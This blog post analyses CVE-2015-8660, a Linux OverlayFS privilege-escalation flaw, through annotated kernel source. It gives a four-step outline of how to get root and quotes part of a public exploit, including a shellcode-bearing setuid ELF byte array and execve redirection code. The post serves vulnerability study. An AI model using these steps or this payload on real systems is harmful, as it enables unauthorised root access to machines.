

2016.01.22

Digging into OverlayFS

Author: Alice

 OverlayFS is a union filesystem for Linux implemented on top of other filesystems. It's often used in conjunction with lightweight virtualization technologies like LXC and Docker. I dug a little bit into the implementation of OverlayFS to understand CVE-2015-8660.


 If you're not familiar with OverlayFS, you should read the kernel documentation for OverlayFS [1].


 In a nutshell, CVE-2015-8660 [3] is a local privilege escalation vulnerability. OverlayFS fails to perform the permission checks it should when a user attempts to change the attributes of a file that lives on the underlying (lower) filesystem. Now, let’s dive into the kernel source.


 When a user runs chmod on a file in an OverlayFS mount, ovl_setattr() is called.


fs/overlayfs/inode.c:

int ovl_setattr(struct dentry *dentry, struct iattr *attr)
{
	int err;
	struct dentry *upperdentry;

	err = ovl_want_write(dentry);
	if (err)
		goto out;

	upperdentry = ovl_dentry_upper(dentry);
	if (upperdentry) {
		mutex_lock(&upperdentry->d_inode->i_mutex);
		err = notify_change(upperdentry, attr, NULL);
		mutex_unlock(&upperdentry->d_inode->i_mutex);
	} else {
		err = ovl_copy_up_last(dentry, attr, false);
	}
	ovl_drop_write(dentry);
out:
	return err;
}

 If the file exists only in the lower filesystem, ovl_copy_up_last() is called. It first copies up the parent directory via ovl_copy_up() and then calls ovl_copy_up_one() for the file itself, passing along the requested attributes.


fs/overlayfs/inode.c:

static int ovl_copy_up_last(struct dentry *dentry, struct iattr *attr,
			    bool no_data)
{
	int err;
	struct dentry *parent;
	struct kstat stat;
	struct path lowerpath;

	parent = dget_parent(dentry);
	err = ovl_copy_up(parent);
	if (err)
		goto out_dput_parent;

	ovl_path_lower(dentry, &lowerpath);
	err = vfs_getattr(&lowerpath, &stat);
	if (err)
		goto out_dput_parent;

	if (no_data)
		stat.size = 0;

	err = ovl_copy_up_one(parent, dentry, &lowerpath, &stat, attr);

out_dput_parent:
	dput(parent);
	return err;
}

 Finally, ovl_copy_up_one() raises capabilities before it changes the attributes of the upper dentry, so the chmod always succeeds regardless of the caller's original credentials.


fs/overlayfs/copy_up.c:

	cap_raise(override_cred->cap_effective, CAP_SYS_ADMIN);
	cap_raise(override_cred->cap_effective, CAP_DAC_OVERRIDE);
	cap_raise(override_cred->cap_effective, CAP_FOWNER);
	cap_raise(override_cred->cap_effective, CAP_FSETID);
	cap_raise(override_cred->cap_effective, CAP_CHOWN);
	cap_raise(override_cred->cap_effective, CAP_MKNOD);
	old_cred = override_creds(override_cred);

	err = -EIO;
	if (lock_rename(workdir, upperdir) != NULL) {
		pr_err("overlayfs: failed to lock workdir+upperdir\n");
		goto out_unlock;
	}
	upperdentry = ovl_dentry_upper(dentry);
	if (upperdentry) {
		unlock_rename(workdir, upperdir);
		err = 0;
		/* Raced with another copy-up?  Do the setattr here */
		if (attr) {
			mutex_lock(&upperdentry->d_inode->i_mutex);
			err = notify_change(upperdentry, attr, NULL);
			mutex_unlock(&upperdentry->d_inode->i_mutex);
		}
		goto out_put_cred;
	}

 A user can escalate privileges to root in four steps: (1) create new user and mount namespaces, (2) mount an OverlayFS with a directory such as /bin as its lower filesystem, (3) set the setuid bit, through the OverlayFS, on a root-owned executable in that directory, and (4) execute the file.


 The exploit by halfdog [2] employs a really interesting technique: it uses error messages from the loader to overwrite a setuid file with "shellcode". The messages are redirected into the file, and the file keeps its setuid permission, as shown below.


UserNamespaceOverlayfsSetuidWriteExec.c:

  char suidExecMinimalElf[] = {
      0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
      0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,
      0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00,
      0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
      0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08,
      0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
      0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8,
      0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80,

      0x31, 0xc0, 0x04, 0xd0, 0xcd, 0x80,

      0x31, 0xc0, 0x89, 0xd0,
      0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x80
  };
  char *helperArgs[]={"/bin/mount", NULL};

...(snip)...

      dup2(destFd, 1);
      dup2(destFd, 2);
      helperArgs[0]=suidWriteNext;
      execve(helperSuidPath, helperArgs, NULL);

 As a side note, CVE-2015-8660 is also a namespace issue. Namespaces, and user namespaces in particular, complicate security in the kernel. Anyway, I love the kernel.



References:

[1] Overlay Filesystem - The Linux Kernel Archives

https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt

[2] Linux User Namespace Overlayfs Local Root Privilege Escalation

http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/

[3] CVE-2015-8660 at MITRE

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-8660

Special Cyber Service Team
Alice